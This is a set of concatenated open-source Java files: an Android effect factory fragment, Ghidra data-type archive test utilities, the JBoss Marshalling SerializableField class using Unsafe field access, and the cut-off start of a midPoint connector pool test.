                // Not found under this prefix; try the next one.
            }
        }
        return null;
    }

    /**
     * Instantiates the given effect class via its (EffectContext, String) constructor.
     *
     * @param effectClass the candidate class; must be a subclass of {@link Effect}
     * @param name the effect name passed through to the effect's constructor
     * @return the constructed effect
     * @throws IllegalArgumentException if the class is not an Effect subclass
     * @throws RuntimeException if the required constructor is missing or construction fails
     */
    private Effect instantiateEffect(Class<?> effectClass, String name) {
        // Make sure this is an Effect subclass; asSubclass also gives us a typed
        // Class object so the constructor lookup below is checked by the compiler.
        Class<? extends Effect> typedClass;
        try {
            typedClass = effectClass.asSubclass(Effect.class);
        } catch (ClassCastException e) {
            throw new IllegalArgumentException("Attempting to allocate effect '" + effectClass
                + "' which is not a subclass of Effect!", e);
        }

        // Look for the correct constructor
        Constructor<? extends Effect> effectConstructor;
        try {
            effectConstructor = typedClass.getConstructor(EffectContext.class, String.class);
        } catch (NoSuchMethodException e) {
            throw new RuntimeException("The effect class '" + effectClass + "' does not have "
                + "the required constructor.", e);
        }

        // Construct the effect
        try {
            return effectConstructor.newInstance(mEffectContext, name);
        } catch (Throwable t) {
            throw new RuntimeException("There was an error constructing the effect '"
                + effectClass + "'!", t);
        }
    }
}
/* ###
 * IP: GHIDRA
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package ghidra.app.plugin.core.datamgr;

import java.io.File;
import java.io.IOException;

import javax.swing.SwingUtilities;

import docking.ActionContext;
import docking.action.DockingActionIf;
import docking.widgets.tree.GTree;
import docking.widgets.tree.GTreeNode;
import generic.test.AbstractGenericTest;
import ghidra.app.plugin.core.datamgr.archive.*;
import ghidra.app.plugin.core.datamgr.tree.ArchiveNode;
import ghidra.app.plugin.core.datamgr.tree.DataTypeArchiveGTree;
import ghidra.program.model.data.*;
import ghidra.program.model.listing.Program;
import ghidra.util.Msg;
import ghidra.util.Swing;
import ghidra.util.task.TaskMonitor;
import utilities.util.FileUtilities;

/**
 * Test utilities for creating, opening, checking out and closing data type archives, and for
 * driving data-type-manager actions from tests.
 */
public class DataTypeTestUtils {

	private static final String ARCHIVE_FILE_EXTENSION = FileDataTypeManager.SUFFIX;

	// Lazily-created scratch directory shared by all archives built in this JVM
	private static File tempArchiveDir;

	static DataTypeArchiveGTree archiveTree;

	private DataTypeTestUtils() {
		// utils class
	}

	private static File getTempDir() throws IOException {
		if (tempArchiveDir == null) {
			tempArchiveDir = AbstractGenericTest.createTempDirectory("archive.db.dir");
		}
		return tempArchiveDir;
	}

	/**
	 * Copies the default test archive ("TestArchive.gdt") into a local version with the
	 * given name.
	 *
	 * @param filename the name of the local archive file to create
	 * @return the newly created archive file, or null if the source archive is missing
	 * @throws Exception if the archive cannot be copied or saved
	 */
	public static File createArchive(String filename) throws Exception {
		return createLocalArchiveFromExistingArchive(filename, "TestArchive.gdt");
	}

	/**
	 * Copies the archive with the given filename to a local version of the same name.
	 *
	 * @param filename the name of the existing test-data archive to copy
	 * @return the newly created archive file, or null if the source archive is missing
	 * @throws Exception if the archive cannot be copied or saved
	 */
	public static File copyArchive(String filename) throws Exception {
		return createLocalArchiveFromExistingArchive(filename, filename);
	}

	private static File createLocalArchiveFromExistingArchive(String filename,
			String existingFilename) throws Exception {

		File tempDir = getTempDir();
		File scratchFile = new File(tempDir, filename);
		if (scratchFile.exists()) {
			scratchFile.delete();
		}

		File packedDbFile = AbstractGenericTest.getTestDataFile(existingFilename);
		if (packedDbFile == null) {
			Msg.debug(DataTypeTestUtils.class,
				"No packed DB file named '" + existingFilename + "'");
			return null;
		}

		// copy the archive DB file to avoid lock contention in parallel testing
		File tempDbFile = new File(tempDir, "copy." + existingFilename);
		tempDbFile.deleteOnExit();
		FileUtilities.copyFile(packedDbFile, tempDbFile, false, TaskMonitor.DUMMY);

		boolean openForUpdate = true; // open for update to allow auto-upgrade to occur if needed
		FileDataTypeManager fm = FileDataTypeManager.openFileArchive(tempDbFile, openForUpdate);
		fm.saveAs(scratchFile);
		fm.close();

		Msg.debug(DataTypeTestUtils.class, "Created test archive: " + scratchFile);
		return scratchFile;
	}

	/**
	 * Opens the named archive found in the given directory.
	 *
	 * @param archiveDirPath directory containing the archive file
	 * @param archiveName the archive file name
	 * @param checkout true to check out the archive after opening
	 * @param plugin the plugin that owns the archive tree
	 * @return the tree node for the opened archive
	 * @throws Exception if the archive cannot be opened
	 */
	public static ArchiveNode openArchive(String archiveDirPath, String archiveName,
			boolean checkout, DataTypeManagerPlugin plugin) throws Exception {

		File file = new File(archiveDirPath, archiveName);
		DataTypeManagerHandler dataTypeManagerHandler = plugin.getDataTypeManagerHandler();

		// this opens the archive and triggers the tree to rebuild
		dataTypeManagerHandler.openArchive(file, checkout, false);
		waitForTree(plugin);

		GTree tree = plugin.getProvider().getGTree();
		GTreeNode rootNode = tree.getModelRoot();
		return (ArchiveNode) rootNode.getChild(trimFullArchiveName(archiveName));
	}

	/**
	 * Opens the named archive from the shared temp directory.
	 *
	 * @param archiveName the archive file name
	 * @param checkout true to check out the archive after opening
	 * @param plugin the plugin that owns the archive tree
	 * @return the tree node for the opened archive
	 * @throws Exception if the archive cannot be opened
	 */
	public static ArchiveNode openArchive(String archiveName, boolean checkout,
			DataTypeManagerPlugin plugin) throws Exception {
		ArchiveNode openArchive = openArchive(archiveName, checkout, false, plugin);
		waitForTree(plugin);
		return openArchive;
	}

	private static void waitForTree(DataTypeManagerPlugin plugin) {
		GTree tree = plugin.getProvider().getGTree();
		while (tree.isBusy()) {
			try {
				Thread.sleep(50);
			}
			catch (InterruptedException e) {
				// Restore the interrupt flag and stop waiting instead of silently
				// swallowing the interruption.
				Thread.currentThread().interrupt();
				break;
			}
		}
		AbstractGenericTest.waitForPostedSwingRunnables();
	}

	public static ArchiveNode openArchive(String archiveName, boolean checkout,
			boolean isUserAction, DataTypeManagerPlugin plugin) throws Exception {

		File tempDir = getTempDir();
		File file = new File(tempDir, archiveName);
		DataTypeManagerHandler dataTypeManagerHandler = plugin.getDataTypeManagerHandler();

		// this opens the archive and triggers the tree to rebuild
		dataTypeManagerHandler.openArchive(file, checkout, isUserAction);

		archiveTree = plugin.getProvider().getGTree();
		GTreeNode rootNode = archiveTree.getViewRoot();
		waitForTree(plugin);
		return (ArchiveNode) rootNode.getChild(trimFullArchiveName(archiveName));
	}

	/**
	 * Closes the archive for the given node on the Swing thread, optionally deleting its
	 * backing file.
	 *
	 * @param archiveNode the node to close; a null node is a no-op
	 * @param deleteFile true to also delete the archive file (file archives only)
	 * @throws Exception if closing fails on the Swing thread
	 */
	public static void closeArchive(final ArchiveNode archiveNode, final boolean deleteFile)
			throws Exception {

		Exception exception = Swing.runNow(() -> {
			try {
				doCloseArchive(archiveNode, deleteFile);
				return null;
			}
			catch (Exception e) {
				return e;
			}
		});

		if (exception != null) {
			throw new RuntimeException("Exception closing archive on Swing thread!: ", exception);
		}
	}

	private static void doCloseArchive(ArchiveNode archiveNode, boolean deleteFile)
			throws Exception {

		if (archiveNode == null) {
			return;
		}

		Archive archive = archiveNode.getArchive();
		File file = null;
		// Capture the file before closing; it is only deletable for file-based archives.
		if ((archive instanceof FileArchive) && deleteFile) {
			file = ((FileArchive) archive).getFile().getFile(false);
		}

		archiveNode.getArchive().close();

		if (file != null) {
			FileDataTypeManager.delete(file);
		}
	}

	/**
	 * Checks out the archive by the given name.
	 *
	 * @param archiveName The name of the archive to open. This must be a child off of the
	 *        root node.
	 * @param plugin The plugin that contains the tree and actions under test
	 * @return The archive node associated with the open archive
	 * @throws Exception If there is any problem finding or opening the archive for the
	 *         given name
	 */
	public static ArchiveNode checkOutArchive(String archiveName,
			final DataTypeManagerPlugin plugin) throws Exception {

		String archiveNodeName = trimFullArchiveName(archiveName);
		GTree tree = plugin.getProvider().getGTree();
		GTreeNode rootNode = tree.getModelRoot();
		ArchiveNode archiveNode = (ArchiveNode) rootNode.getChild(archiveNodeName);
		if (archiveNode == null) {
			throw new IllegalArgumentException(
				"Unable to locate an archive by the name: " + archiveNodeName);
		}

		ArchiveUtils.lockArchive((FileArchive) archiveNode.getArchive());

		// checking out the archive causes the trees nodes to be recreated
		return (ArchiveNode) rootNode.getChild(archiveNodeName);
	}

	/**
	 * Trims the given string if it ends with {@link #ARCHIVE_FILE_EXTENSION}.
	 * @param archiveName The name to trim
	 * @return The original name, trimmed as necessary
	 */
	private static String trimFullArchiveName(String archiveName) {
		if (archiveName.endsWith(ARCHIVE_FILE_EXTENSION)) {
			// Strip the suffix from the end of the name. Using indexOf() here would
			// mis-trim any name that also contains the extension text in the middle.
			return archiveName.substring(0,
				archiveName.length() - ARCHIVE_FILE_EXTENSION.length());
		}
		return archiveName;
	}

	public static ArchiveNode createOpenAndCheckoutArchive(String archiveName,
			DataTypeManagerPlugin plugin) throws Exception {
		createArchive(archiveName);
		return openArchive(archiveName, true, plugin);
	}

	public static ArchiveNode copyOpenAndCheckoutArchive(String archiveName,
			DataTypeManagerPlugin plugin) throws Exception {
		copyArchive(archiveName);
		return openArchive(archiveName, true, plugin);
	}

	public static void performAction(DockingActionIf action, Program program, GTree tree) {
		performAction(action, program, tree, true);
	}

	public static void performAction(DockingActionIf action, Program program, GTree tree,
			boolean wait) {

		AbstractGenericTest.runSwing(() -> {
			ActionContext context =
				new DataTypesActionContext(null, program, (DataTypeArchiveGTree) tree, null, true);
			action.actionPerformed(context);
		}, wait);

		if (!SwingUtilities.isEventDispatchThread()) {
			AbstractGenericTest.waitForSwing();
		}
	}

	public static void performAction(DockingActionIf action, GTree tree) {
		performAction(action, tree, true);
	}

	public static void performAction(DockingActionIf action, GTree tree, boolean wait) {

		AbstractGenericTest.runSwing(() -> {
			ActionContext context =
				new DataTypesActionContext(null, null, (DataTypeArchiveGTree) tree, null, true);
			action.actionPerformed(context);
		}, wait);

		if (!SwingUtilities.isEventDispatchThread()) {
			AbstractGenericTest.waitForSwing();
		}
	}

	/**
	 * Creates a category under the given parent inside a transaction.
	 *
	 * @param parent the parent category
	 * @param categoryName the name of the new category
	 * @throws Exception if creation fails
	 */
	public static void createCategory(Category parent, String categoryName) throws Exception {
		DataTypeManager dtm = parent.getDataTypeManager();
		int id = dtm.startTransaction("create category");
		try {
			parent.createCategory(categoryName);
		}
		finally {
			dtm.endTransaction(id, true);
		}
	}
}
/*
 * JBoss, Home of Professional Open Source.
 * Copyright 2014 Red Hat, Inc., and individual contributors
 * as indicated by the @author tags.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.jboss.marshalling.reflect;

import static java.lang.System.getSecurityManager;
import static java.security.AccessController.doPrivileged;

import java.io.IOException;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

import org.jboss.marshalling._private.GetUnsafeAction;
import org.jboss.marshalling.util.Kind;

import sun.misc.Unsafe;

/**
 * Reflection information about a field on a serializable class.
 */
public final class SerializableField {

    // Acquire Unsafe directly when no security manager is installed, otherwise via a
    // doPrivileged block so the access check succeeds under a security manager.
    static final Unsafe unsafe = getSecurityManager() == null ? GetUnsafeAction.INSTANCE.run() : doPrivileged(GetUnsafeAction.INSTANCE);

    // the type of the field itself
    private final Class<?> type;
    // reflection field backing this descriptor, or null when there is no actual field
    private final Field field;
    // the serializable field name
    private final String name;
    // whether the field was declared "unshared" for serialization purposes
    private final boolean unshared;
    // primitive/object kind, derived from `type` in the constructor
    private final Kind kind;
    // Unsafe offset of the backing field, or -1 when field == null
    private final long fieldOffset;

    public SerializableField(Class<?> type, String name, boolean unshared) {
        this(type, name, unshared, null);
    }

    SerializableField(Class<?> type, String name, boolean unshared, final Field field) {
        // Static fields and fields "declared" on array classes are never valid here.
        assert field == null || (field.getModifiers() & Modifier.STATIC) == 0 && ! field.getDeclaringClass().isArray();
        this.type = type;
        this.name = name;
        this.unshared = unshared;
        this.field = field;
        // -1 is the sentinel for "no backing field"; the setters/getters below guard on
        // field != null before ever using the offset.
        fieldOffset = field == null ? -1 : unsafe.objectFieldOffset(field);
        if (field != null) {
            // verify field information
            if (field.getType() != type) {
                throw new IllegalStateException("Constructed a serializable field with the wrong type (field type is " + field.getType() + ", our type is " + type + ")");
            }
            if (! field.getName().equals(name)) {
                throw new IllegalStateException("Constructed a serializable field with the wrong name (field name is " + field.getName() + ", our name is " + name + ")");
            }
        }
        // Map the declared type to its Kind; identity comparison is correct for the
        // primitive class objects.  todo - see if a small Map is faster
        if (type == boolean.class) {
            kind = Kind.BOOLEAN;
        } else if (type == byte.class) {
            kind = Kind.BYTE;
        } else if (type == short.class) {
            kind = Kind.SHORT;
        } else if (type == int.class) {
            kind = Kind.INT;
        } else if (type == long.class) {
            kind = Kind.LONG;
        } else if (type == char.class) {
            kind = Kind.CHAR;
        } else if (type == float.class) {
            kind = Kind.FLOAT;
        } else if (type == double.class) {
            kind = Kind.DOUBLE;
        } else {
            kind = Kind.OBJECT;
        }
    }

    /**
     * Get the reflection {@code Field} for this serializable field. The resultant field will be accessible.
     *
     * @return the reflection field
     * @deprecated As of Java 9, accessible fields are generally disallowed; use the {@code #setXXX(Object,value)} methods instead.
     */
    @Deprecated
    public Field getField() {
        return field;
    }

    /**
     * Determine if this object may be used to get or set an object field value.
     *
     * @return {@code true} if this object may be used to get or set an object field value, {@code false} otherwise
     */
    public boolean isAccessible() {
        return field != null;
    }

    /**
     * Get the name of the field.
     *
     * @return the name
     */
    public String getName() {
        return name;
    }

    /**
     * Determine whether this field is marked as "unshared".
     *
     * @return {@code true} if the field is unshared
     */
    public boolean isUnshared() {
        return unshared;
    }

    /**
     * Get the kind of field.
     *
     * @return the kind
     */
    public Kind getKind() {
        return kind;
    }

    /**
     * Get the field type.
     *
     * @return the field type
     */
    // NOTE(review): ClassNotFoundException is never thrown by this body; the declaration
    // appears to be retained for API compatibility -- confirm before removing.
    public Class<?> getType() throws ClassNotFoundException {
        return type;
    }

    /**
     * Set the boolean value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setBoolean(Object instance, boolean value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        // cast() throws ClassCastException if instance is of the wrong declaring class;
        // the explicit type check below guards the raw Unsafe write that follows.
        field.getDeclaringClass().cast(instance);
        if (field.getType() != boolean.class) {
            throw new ClassCastException();
        }
        unsafe.putBoolean(instance, fieldOffset, value);
    }

    /**
     * Set the char value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setChar(Object instance, char value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != char.class) {
            throw new ClassCastException();
        }
        unsafe.putChar(instance, fieldOffset, value);
    }

    /**
     * Set the byte value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setByte(Object instance, byte value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != byte.class) {
            throw new ClassCastException();
        }
        unsafe.putByte(instance, fieldOffset, value);
    }

    /**
     * Set the short value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setShort(Object instance, short value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != short.class) {
            throw new ClassCastException();
        }
        unsafe.putShort(instance, fieldOffset, value);
    }

    /**
     * Set the integer value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setInt(Object instance, int value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != int.class) {
            throw new ClassCastException();
        }
        unsafe.putInt(instance, fieldOffset, value);
    }

    /**
     * Set the long value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setLong(Object instance, long value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != long.class) {
            throw new ClassCastException();
        }
        unsafe.putLong(instance, fieldOffset, value);
    }

    /**
     * Set the float value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setFloat(Object instance, float value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != float.class) {
            throw new ClassCastException();
        }
        unsafe.putFloat(instance, fieldOffset, value);
    }

    /**
     * Set the double value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setDouble(Object instance, double value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != double.class) {
            throw new ClassCastException();
        }
        unsafe.putDouble(instance, fieldOffset, value);
    }

    /**
     * Set the object value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @param value the value to set
     * @throws ClassCastException if {@code instance} or the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public void setObject(Object instance, Object value) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        final Class<?> fieldType = field.getType();
        // An object write into a primitive-typed field is never valid.
        if (fieldType.isPrimitive()) {
            throw new ClassCastException();
        }
        // Verify the value is assignable to the field type before the raw Unsafe write.
        fieldType.cast(value);
        unsafe.putObject(instance, fieldOffset, value);
    }

    /**
     * Get the boolean value of this field on the given object instance.
     *
     * @param instance the object instance (must not be {@code null}, must be of the correct type)
     * @return the value of the field
     * @throws ClassCastException if the field is not of the correct type
     * @throws IllegalArgumentException if this instance has no reflection field set on it
     */
    public boolean getBoolean(Object instance) throws ClassCastException, IllegalArgumentException {
        if (instance == null) {
            throw new IllegalArgumentException("instance is null");
        }
        if (field == null) {
            throw new IllegalArgumentException();
        }
        field.getDeclaringClass().cast(instance);
        if (field.getType() != boolean.class) {
            throw new ClassCastException();
        }
        return unsafe.getBoolean(instance, fieldOffset);
    }

    /**
     * Get the char value of this field on the given object instance.
* * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public char getChar(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != char.class) { throw new ClassCastException(); } return unsafe.getChar(instance, fieldOffset); } /** * Get the byte value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public byte getByte(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != byte.class) { throw new ClassCastException(); } return unsafe.getByte(instance, fieldOffset); } /** * Get the short value of this field on the given object instance. 
* * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public short getShort(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != short.class) { throw new ClassCastException(); } return unsafe.getShort(instance, fieldOffset); } /** * Get the integer value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public int getInt(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != int.class) { throw new ClassCastException(); } return unsafe.getInt(instance, fieldOffset); } /** * Get the long value of this field on the given object instance. 
* * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public long getLong(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != long.class) { throw new ClassCastException(); } return unsafe.getLong(instance, fieldOffset); } /** * Get the float value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public float getFloat(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != float.class) { throw new ClassCastException(); } return unsafe.getFloat(instance, fieldOffset); } /** * Get the double value of this field on the given object instance. 
* * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public double getDouble(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != double.class) { throw new ClassCastException(); } return unsafe.getDouble(instance, fieldOffset); } /** * Get the object value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public Object getObject(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType().isPrimitive()) { throw new ClassCastException(); } return unsafe.getObject(instance, fieldOffset); } /** * Read the field value from the stream. 
* * @param instance the instance * @param input the source stream * @throws IOException if an I/O error occurs * @throws ClassNotFoundException if a class could not be loaded */ public void readFrom(Object instance, ObjectInput input) throws IOException, ClassNotFoundException { switch (kind) { case BOOLEAN: setBoolean(instance, input.readBoolean()); break; case BYTE: setByte(instance, input.readByte()); break; case CHAR: setChar(instance, input.readChar()); break; case DOUBLE: setDouble(instance, input.readDouble()); break; case FLOAT: setFloat(instance, input.readFloat()); break; case INT: setInt(instance, input.readInt()); break; case LONG: setLong(instance, input.readLong()); break; case SHORT: setShort(instance, input.readShort()); break; case OBJECT: setObject(instance, input.readObject()); break; default: throw new IllegalStateException(); } } public void writeTo(Object instance, ObjectOutput output) throws IOException { switch (kind) { case BOOLEAN: output.writeBoolean(getBoolean(instance)); break; case BYTE: output.writeByte(getByte(instance)); break; case CHAR: output.writeChar(getChar(instance)); break; case DOUBLE: output.writeDouble(getDouble(instance)); break; case FLOAT: output.writeFloat(getFloat(instance)); break; case INT: output.writeInt(getInt(instance)); break; case LONG: output.writeLong(getLong(instance)); break; case SHORT: output.writeShort(getShort(instance)); break; case OBJECT: output.writeObject(getObject(instance)); break; default: throw new IllegalStateException(); } } }
/*
 * Copyright (c) 2010-2016 Evolveum
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.evolveum.midpoint.provisioning.impl.ucf;

import static com.evolveum.midpoint.test.IntegrationTestTools.display;
import static org.testng.AssertJUnit.assertEquals;
import static org.testng.AssertJUnit.assertFalse;
import static org.testng.AssertJUnit.assertNotNull;

import java.util.ArrayList;
import java.util.Collection;
import java.util.List;

import org.springframework.test.context.ContextConfiguration;
import org.testng.annotations.Test;

import com.evolveum.icf.dummy.resource.DummyAccount;
import com.evolveum.midpoint.prism.PrismContainerDefinition;
import com.evolveum.midpoint.prism.PrismContainerValue;
import com.evolveum.midpoint.prism.PrismObject;
import com.evolveum.midpoint.prism.query.ObjectQuery;
import com.evolveum.midpoint.prism.schema.PrismSchema;
import com.evolveum.midpoint.prism.schema.SchemaRegistry;
import com.evolveum.midpoint.prism.util.PrismTestUtil;
import com.evolveum.midpoint.provisioning.ucf.api.GenericFrameworkException;
import com.evolveum.midpoint.provisioning.ucf.api.ResultHandler;
import com.evolveum.midpoint.provisioning.ucf.impl.ConnectorFactoryIcfImpl;
import com.evolveum.midpoint.schema.processor.ObjectClassComplexTypeDefinition;
import com.evolveum.midpoint.schema.processor.ResourceAttribute;
import com.evolveum.midpoint.schema.processor.ResourceAttributeContainer;
import com.evolveum.midpoint.schema.result.OperationResult;
import com.evolveum.midpoint.schema.statistics.ConnectorOperationalStatus;
import com.evolveum.midpoint.schema.util.ResourceTypeUtil;
import com.evolveum.midpoint.schema.util.ShadowUtil;
import com.evolveum.midpoint.test.util.TestUtil;
import com.evolveum.midpoint.util.exception.CommunicationException;
import com.evolveum.midpoint.util.exception.ObjectNotFoundException;
import com.evolveum.midpoint.util.exception.SchemaException;
import com.evolveum.midpoint.util.exception.SecurityViolationException;
import com.evolveum.midpoint.util.logging.Trace;
import com.evolveum.midpoint.util.logging.TraceManager;
import com.evolveum.midpoint.xml.ns._public.common.common_3.ConnectorConfigurationType;
import com.evolveum.midpoint.xml.ns._public.common.common_3.ObjectReferenceType;
import com.evolveum.midpoint.xml.ns._public.common.common_3.ShadowKindType;
import com.evolveum.midpoint.xml.ns._public.common.common_3.ShadowType;

/**
 * UCF test with dummy resource and several connector instances.
 *
 * Exercises the connector pool: non-blocking searches should use a single idle
 * instance, while concurrent blocking searches should force the pool to hand
 * out multiple active instances.
 *
 * @author Radovan Semancik
 */
@ContextConfiguration(locations = { "classpath:ctx-provisioning-test-no-repo.xml" })
public class TestUcfDummyMulti extends AbstractUcfDummyTest {

	private static final Trace LOGGER = TraceManager.getTrace(TestUcfDummyMulti.class);

	/**
	 * Sanity check: the ICF configuration (icfc) and schema (icfs) namespaces
	 * must be resolvable from the prism context before any connector is used.
	 */
	@Test
	public void test000PrismContextSanity() throws Exception {
		final String TEST_NAME = "test000PrismContextSanity";
		TestUtil.displayTestTile(TEST_NAME);

		SchemaRegistry schemaRegistry = PrismTestUtil.getPrismContext().getSchemaRegistry();
		PrismSchema schemaIcfc = schemaRegistry.findSchemaByNamespace(ConnectorFactoryIcfImpl.NS_ICF_CONFIGURATION);
		assertNotNull("ICFC schema not found in the context ("+ConnectorFactoryIcfImpl.NS_ICF_CONFIGURATION+")", schemaIcfc);
		PrismContainerDefinition<ConnectorConfigurationType> configurationPropertiesDef =
				schemaIcfc.findContainerDefinitionByElementName(ConnectorFactoryIcfImpl.CONNECTOR_SCHEMA_CONFIGURATION_PROPERTIES_ELEMENT_QNAME);
		assertNotNull("icfc:configurationProperties not found in icfc schema ("+
